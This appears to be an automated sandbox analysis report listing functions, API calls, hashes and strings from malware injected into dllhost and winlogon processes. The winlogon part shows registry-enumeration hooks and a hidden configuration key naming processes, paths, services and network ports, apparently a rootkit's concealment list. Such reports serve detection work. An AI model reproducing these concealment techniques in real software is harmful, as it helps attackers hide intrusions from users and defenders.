Associated: 00000025.00000002.2546068946.00000279A9285000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2546983291.00000279A9290000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2547866832.00000279A9292000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2548736405.00000279A9299000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_279a9270000_dllhost.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
Instruction ID: b1fde369eac3f7b3364421eba18d15ba7ab4723258cf6f9bcd989d3449fc874c
Opcode Fuzzy Hash: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
Instruction Fuzzy Hash: 2651143620E7819AFB24DE3AA55C3AA6795F3C4BA0F564025CE4D63F89DE39C4C4C740

Function 00000279A92A25DC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 00000279A92A26C2
StrCpyW.SHLWAPI ref: 00000279A92A26D9

Strings

\\.\pipe\, xrefs: 00000279A92A26CD

Memory Dump Source

Source File: 00000025.00000002.2550451868.00000279A92A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A92A0000, based on PE: true

Associated: 00000025.00000002.2549598650.00000279A92A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2551511389.00000279A92B5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2552354910.00000279A92C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2553180197.00000279A92C2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2553981338.00000279A92C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_279a92a0000_dllhost.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
Instruction ID: b0ba01b053ee4cf30f9de35873d4cbe59e27677d5b56eaab2a133bf38cdcec68
Opcode Fuzzy Hash: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
Instruction Fuzzy Hash: 5851172720E78189FB64DE39A89C3AA6791F385BA0F460025DD5D43F99DE39CEC4C740

Function 00000279A9282660 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00000279A9282778
GetLastError.KERNEL32 ref: 00000279A928279D

Strings

U, xrefs: 00000279A9282722

Memory Dump Source

Source File: 00000025.00000002.2545067305.00000279A9271000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A9270000, based on PE: true

Associated: 00000025.00000002.2544195957.00000279A9270000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2546068946.00000279A9285000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2546983291.00000279A9290000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2547866832.00000279A9292000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2548736405.00000279A9299000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_279a9270000_dllhost.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
Instruction ID: 0cafe1bd4bef3c4af76d395c55d7aac122a0ff5cd2a2a8185e514eebb4aaf477
Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
Instruction Fuzzy Hash: A041097262AB808AE720DF66E4487DAB7A4F3587E4F918121EE4D87758EF3CC481C740

Function 00000279A92B2660 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00000279A92B2778
GetLastError.KERNEL32 ref: 00000279A92B279D

Strings

U, xrefs: 00000279A92B2722

Memory Dump Source

Source File: 00000025.00000002.2550451868.00000279A92A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A92A0000, based on PE: true

Associated: 00000025.00000002.2549598650.00000279A92A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2551511389.00000279A92B5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2552354910.00000279A92C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2553180197.00000279A92C2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2553981338.00000279A92C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_279a92a0000_dllhost.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
Instruction ID: 5b8d877bd39ad06b0551107a96cb3f93cf9d695089a2309253a988dfb06fd14c
Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
Instruction Fuzzy Hash: 5141D97362AB808AE750DF65E44C79AB7E4F3587A4F454121EE4E87754EF38C481CB44

Function 00000279A9279178 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.NTDLL ref: 00000279A92791C8
RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00000279A92787F7), ref: 00000279A9279209

Strings

csm, xrefs: 00000279A92791F6

Memory Dump Source

Source File: 00000025.00000002.2545067305.00000279A9271000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A9270000, based on PE: true

Associated: 00000025.00000002.2544195957.00000279A9270000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2546068946.00000279A9285000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2546983291.00000279A9290000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2547866832.00000279A9292000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2548736405.00000279A9299000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_279a9270000_dllhost.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
Instruction ID: 0ef5216e11e82ccbb8c93b1f46ae9a13059d3812fde6b0107ac2cac2b68c0841
Opcode Fuzzy Hash: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
Instruction Fuzzy Hash: 4C113D36219B8086EB218F15F448259B7E5F788BA4F598264EE8D07B68DF3CC5A1CB00

Function 00000279A92A9178 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.NTDLL ref: 00000279A92A91C8
RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00000279A92A87F7), ref: 00000279A92A9209

Strings

csm, xrefs: 00000279A92A91F6

Memory Dump Source

Source File: 00000025.00000002.2550451868.00000279A92A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A92A0000, based on PE: true

Associated: 00000025.00000002.2549598650.00000279A92A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2551511389.00000279A92B5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2552354910.00000279A92C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2553180197.00000279A92C2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2553981338.00000279A92C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_279a92a0000_dllhost.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
Instruction ID: bb0137db9af0e3c478c299a86958ad44422e4f731d942471ca42172c9c9be055
Opcode Fuzzy Hash: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
Instruction Fuzzy Hash: 3B113D36219B8086EB618F19F448259B7E5F798BA4F594220EF8D07B64DF3CC991CB00

Function 00000001400020CC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,00000000,0000000140002C18), ref: 00000001400020DC
GetProcAddress.KERNEL32(?,?,00000000,0000000140002C18), ref: 00000001400020EF

Strings

ntdll.dll, xrefs: 00000001400020D2

Memory Dump Source

Source File: 00000025.00000002.2525914365.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000025.00000002.2525086326.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2526696098.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2527566343.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_140000000_dllhost.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: ntdll.dll
API String ID: 1646373207-2227199552
Opcode ID: 0017c025cb5e8a7c9b0335d05a9c08c4f9d8e31f703f37c02c29db0b138d9ce4
Instruction ID: 17fa8e42c722db624f1936625922d1a8ab69534039b48c71a9bb0a293c881c2b
Opcode Fuzzy Hash: 0017c025cb5e8a7c9b0335d05a9c08c4f9d8e31f703f37c02c29db0b138d9ce4
Instruction Fuzzy Hash: CAD0C9F8B1260182EF1AEB6778553E152515B6DBC9F4940209F0647772DE38C0E48318

Function 00000279A9271D30 Relevance: 5.0, APIs: 4, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00000279A9271D69
HeapAlloc.KERNEL32 ref: 00000279A9271D77
GetProcessHeap.KERNEL32 ref: 00000279A9271D9C
HeapFree.KERNEL32 ref: 00000279A9271DAA

Memory Dump Source

Source File: 00000025.00000002.2545067305.00000279A9271000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A9270000, based on PE: true

Associated: 00000025.00000002.2544195957.00000279A9270000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2546068946.00000279A9285000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2546983291.00000279A9290000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2547866832.00000279A9292000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2548736405.00000279A9299000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_279a9270000_dllhost.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID:
API String ID: 756756679-0
Opcode ID: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
Instruction ID: 8fc56203a431a98e9b95bc85fed72bacdcaf30a18674613168ee9c7acf2ef07f
Opcode Fuzzy Hash: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
Instruction Fuzzy Hash: FB118025A16B8089EB14DF66A84C65977B0FB88FE0F5A8128DE4E53765EF38D482C300

Function 00000279A92A1D30 Relevance: 5.0, APIs: 4, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00000279A92A1D69
HeapAlloc.KERNEL32 ref: 00000279A92A1D77
GetProcessHeap.KERNEL32 ref: 00000279A92A1D9C
HeapFree.KERNEL32 ref: 00000279A92A1DAA

Memory Dump Source

Source File: 00000025.00000002.2550451868.00000279A92A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A92A0000, based on PE: true

Associated: 00000025.00000002.2549598650.00000279A92A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2551511389.00000279A92B5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2552354910.00000279A92C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2553180197.00000279A92C2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2553981338.00000279A92C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_279a92a0000_dllhost.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID:
API String ID: 756756679-0
Opcode ID: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
Instruction ID: d5622158ad8d5f18c24ad096998ea8dcead447809a86f5dc738eb04bd5c4de46
Opcode Fuzzy Hash: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
Instruction Fuzzy Hash: 1811C026A1AF8089EB15DB66A80C25977F0F788FE0F5A4024DF4E57725EF38D482C300

Function 00000279A9271264 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00000279A927126A
HeapAlloc.KERNEL32 ref: 00000279A9271279
GetProcessHeap.KERNEL32 ref: 00000279A9271293
HeapAlloc.KERNEL32 ref: 00000279A92712A4

Memory Dump Source

Source File: 00000025.00000002.2545067305.00000279A9271000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A9270000, based on PE: true

Associated: 00000025.00000002.2544195957.00000279A9270000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2546068946.00000279A9285000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2546983291.00000279A9290000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2547866832.00000279A9292000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2548736405.00000279A9299000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_279a9270000_dllhost.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
Instruction ID: 07ef75b36cd48f40e8c93a33e9a97ccd4155f91f686b8a431e7d2a10fb791518
Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
Instruction Fuzzy Hash: CDE06535A02B049EE7288F62D80C74936E1FB88F25F4AC024CD0D07360EF7D84D98B80

Function 00000279A92A1264 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00000279A92A126A
HeapAlloc.KERNEL32 ref: 00000279A92A1279
GetProcessHeap.KERNEL32 ref: 00000279A92A1293
HeapAlloc.KERNEL32 ref: 00000279A92A12A4

Memory Dump Source

Source File: 00000025.00000002.2550451868.00000279A92A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A92A0000, based on PE: true

Associated: 00000025.00000002.2549598650.00000279A92A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2551511389.00000279A92B5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2552354910.00000279A92C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2553180197.00000279A92C2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2553981338.00000279A92C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_279a92a0000_dllhost.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
Instruction ID: a0b9e583586c0f11b707b6da49ec884c94a9f86045a740cecfdfd5e7588ccdcd
Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
Instruction Fuzzy Hash: F5E06D356227049EE7148F62D80C74936E1FB88F25F46C024CD0E0B350EF7D94D98740

Function 0000000140001220 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,00000000,0000000140001544), ref: 0000000140001226
HeapAlloc.KERNEL32(?,?,00000000,0000000140001544), ref: 0000000140001235
GetProcessHeap.KERNEL32(?,?,00000000,0000000140001544), ref: 000000014000124F
HeapAlloc.KERNEL32(?,?,00000000,0000000140001544), ref: 0000000140001260

Memory Dump Source

Source File: 00000025.00000002.2525914365.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000025.00000002.2525086326.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2526696098.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2527566343.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_140000000_dllhost.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: c7a43bef6df9d8d05703a7189659e0aa7f0603dabacb6fa5d63025371af7a52a
Instruction ID: 6e91e1ae57bb2f507bdd30ccb813d710b9eda330d3ff7d449275dd8231ce62c3
Opcode Fuzzy Hash: c7a43bef6df9d8d05703a7189659e0aa7f0603dabacb6fa5d63025371af7a52a
Instruction Fuzzy Hash: EBE032F1B41A0086E709DB63E80838936E1EB9CB85F898024AA0907371DF7D85D98B90

Function 00000279A9271000 Relevance: 5.0, APIs: 4, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00000279A9271006
HeapAlloc.KERNEL32 ref: 00000279A9271015
GetProcessHeap.KERNEL32 ref: 00000279A9271028
HeapAlloc.KERNEL32 ref: 00000279A9271037

Memory Dump Source

Source File: 00000025.00000002.2545067305.00000279A9271000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A9270000, based on PE: true

Associated: 00000025.00000002.2544195957.00000279A9270000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2546068946.00000279A9285000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2546983291.00000279A9290000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2547866832.00000279A9292000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2548736405.00000279A9299000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_279a9270000_dllhost.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
Instruction ID: 9f35fee8613f69eed9fb7f34a4fdd82bb69d687884a5d1f3ce5aab10689d7f68
Opcode Fuzzy Hash: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
Instruction Fuzzy Hash: 17E0E575612A04AAE7289F62D80865976A1FB88F25F8AC064CD0907320EE3C84D99B10

Function 00000279A92A1000 Relevance: 5.0, APIs: 4, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00000279A92A1006
HeapAlloc.KERNEL32 ref: 00000279A92A1015
GetProcessHeap.KERNEL32 ref: 00000279A92A1028
HeapAlloc.KERNEL32 ref: 00000279A92A1037

Memory Dump Source

Source File: 00000025.00000002.2550451868.00000279A92A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A92A0000, based on PE: true

Associated: 00000025.00000002.2549598650.00000279A92A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2551511389.00000279A92B5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2552354910.00000279A92C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2553180197.00000279A92C2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2553981338.00000279A92C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_279a92a0000_dllhost.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
Instruction ID: 2e01c5741c952e24420e10818d2298834863190f059fa9e2f1f0483336d9af7b
Opcode Fuzzy Hash: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
Instruction Fuzzy Hash: 02E0ED756226049AE7199B62D80C65976E1FB88B25F458024CD0A0B310EE3C94D99610

Function 0000000140001000 Relevance: 5.0, APIs: 4, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,00000000,000000014000154C), ref: 0000000140001006
HeapAlloc.KERNEL32(?,?,00000000,000000014000154C), ref: 0000000140001015
GetProcessHeap.KERNEL32(?,?,00000000,000000014000154C), ref: 0000000140001028
HeapAlloc.KERNEL32(?,?,00000000,000000014000154C), ref: 0000000140001037

Memory Dump Source

Source File: 00000025.00000002.2525914365.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000025.00000002.2525086326.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2526696098.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2527566343.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_140000000_dllhost.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 63251503df5c7392b59882377b05ff3c407c5ffe99838fad78ad3d93c79eabbc
Instruction ID: a4bc93d2c7b124559308cf7a4161fd93bc4ab92d57e3b019964b2e6119ad9c46
Opcode Fuzzy Hash: 63251503df5c7392b59882377b05ff3c407c5ffe99838fad78ad3d93c79eabbc
Instruction Fuzzy Hash: B7E0EDF1B5150086E709DB63E84439976A1FB9CB55F858024DA1907731DE3885D58654

Analysis Process: winlogon.exePID: 556, Parent PID: 3268COMMON

Execution Graph

Execution Coverage:	2.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	483
Total number of Limit Nodes:	28

Executed Functions

Function 000001CA7D1E2C80 Relevance: 13.6, APIs: 9, Instructions: 131
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

TlsGetValue.KERNEL32 ref: 000001CA7D1E2CAD
TlsGetValue.KERNEL32 ref: 000001CA7D1E2CBC
TlsGetValue.KERNEL32 ref: 000001CA7D1E2CCB
NtEnumerateValueKey.NTDLL ref: 000001CA7D1E2D40
NtEnumerateValueKey.NTDLL ref: 000001CA7D1E2D76
NtEnumerateValueKey.NTDLL ref: 000001CA7D1E2DB3
TlsSetValue.KERNEL32 ref: 000001CA7D1E2E0F
TlsSetValue.KERNEL32 ref: 000001CA7D1E2E1E
TlsSetValue.KERNEL32 ref: 000001CA7D1E2E2D

Memory Dump Source

Source File: 00000026.00000002.2551471326.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true

Associated: 00000026.00000002.2550625621.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2552462016.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2553296974.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2554151398.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2555098305.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_1ca7d1e0000_winlogon.jbxd

Similarity

API ID: Value$Enumerate
String ID:
API String ID: 3520290360-0
Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
Instruction ID: ddcfc76e88451ae92f4f9cda427641abdeb8210533d5a923a24e23578d1e4606
Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
Instruction Fuzzy Hash: BF51C333B4570487F326CB15E460E9AB3A4FB84B89F904119AE4A43754EF3AC905CB83

Function 000001CA7D1E1724 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157
registrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 000001CA7D1E172F
HeapAlloc.KERNEL32 ref: 000001CA7D1E173E

Part of subcall function 000001CA7D1E1264: GetProcessHeap.KERNEL32 ref: 000001CA7D1E126A
Part of subcall function 000001CA7D1E1264: HeapAlloc.KERNEL32 ref: 000001CA7D1E1279
Part of subcall function 000001CA7D1E1264: GetProcessHeap.KERNEL32 ref: 000001CA7D1E1293
Part of subcall function 000001CA7D1E1264: HeapAlloc.KERNEL32 ref: 000001CA7D1E12A4

Part of subcall function 000001CA7D1E1000: GetProcessHeap.KERNEL32 ref: 000001CA7D1E1006
Part of subcall function 000001CA7D1E1000: HeapAlloc.KERNEL32 ref: 000001CA7D1E1015
Part of subcall function 000001CA7D1E1000: GetProcessHeap.KERNEL32 ref: 000001CA7D1E1028
Part of subcall function 000001CA7D1E1000: HeapAlloc.KERNEL32 ref: 000001CA7D1E1037

RegOpenKeyExW.KERNELBASE ref: 000001CA7D1E17AE
RegOpenKeyExW.KERNELBASE ref: 000001CA7D1E17DB
RegCloseKey.ADVAPI32 ref: 000001CA7D1E17F5
RegOpenKeyExW.KERNELBASE ref: 000001CA7D1E1815
RegCloseKey.KERNELBASE ref: 000001CA7D1E1830
RegOpenKeyExW.KERNELBASE ref: 000001CA7D1E1850
RegCloseKey.ADVAPI32 ref: 000001CA7D1E186B
RegOpenKeyExW.KERNELBASE ref: 000001CA7D1E188B
RegCloseKey.ADVAPI32 ref: 000001CA7D1E18A6
RegOpenKeyExW.KERNELBASE ref: 000001CA7D1E18C6
RegCloseKey.ADVAPI32 ref: 000001CA7D1E18E1
RegOpenKeyExW.KERNELBASE ref: 000001CA7D1E1901
RegCloseKey.ADVAPI32 ref: 000001CA7D1E191C
RegOpenKeyExW.KERNELBASE ref: 000001CA7D1E193C
RegCloseKey.ADVAPI32 ref: 000001CA7D1E1957
RegOpenKeyExW.KERNELBASE ref: 000001CA7D1E1977
RegCloseKey.ADVAPI32 ref: 000001CA7D1E1992
RegCloseKey.KERNELBASE ref: 000001CA7D1E199C

Part of subcall function 000001CA7D1E12B8: RegQueryInfoKeyW.ADVAPI32 ref: 000001CA7D1E1315
Part of subcall function 000001CA7D1E12B8: GetProcessHeap.KERNEL32 ref: 000001CA7D1E1323
Part of subcall function 000001CA7D1E12B8: HeapAlloc.KERNEL32 ref: 000001CA7D1E1334
Part of subcall function 000001CA7D1E12B8: RegEnumValueW.ADVAPI32 ref: 000001CA7D1E1393
Part of subcall function 000001CA7D1E12B8: GetProcessHeap.KERNEL32 ref: 000001CA7D1E13DB
Part of subcall function 000001CA7D1E12B8: HeapAlloc.KERNEL32 ref: 000001CA7D1E13E9
Part of subcall function 000001CA7D1E12B8: GetProcessHeap.KERNEL32 ref: 000001CA7D1E1406
Part of subcall function 000001CA7D1E12B8: HeapFree.KERNEL32 ref: 000001CA7D1E1414
Part of subcall function 000001CA7D1E12B8: lstrlenW.KERNEL32 ref: 000001CA7D1E141D
Part of subcall function 000001CA7D1E12B8: GetProcessHeap.KERNEL32 ref: 000001CA7D1E142B
Part of subcall function 000001CA7D1E12B8: HeapAlloc.KERNEL32 ref: 000001CA7D1E1439

Strings

paths, xrefs: 000001CA7D1E1884
service_names, xrefs: 000001CA7D1E18BF
pid, xrefs: 000001CA7D1E180E
process_names, xrefs: 000001CA7D1E1849
udp, xrefs: 000001CA7D1E1970
tcp_local, xrefs: 000001CA7D1E18FA
SOFTWARE\$cnt-config, xrefs: 000001CA7D1E178E
startup, xrefs: 000001CA7D1E17D1
tcp_remote, xrefs: 000001CA7D1E1935

Memory Dump Source

Source File: 00000026.00000002.2551471326.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true

Associated: 00000026.00000002.2550625621.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2552462016.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2553296974.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2554151398.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
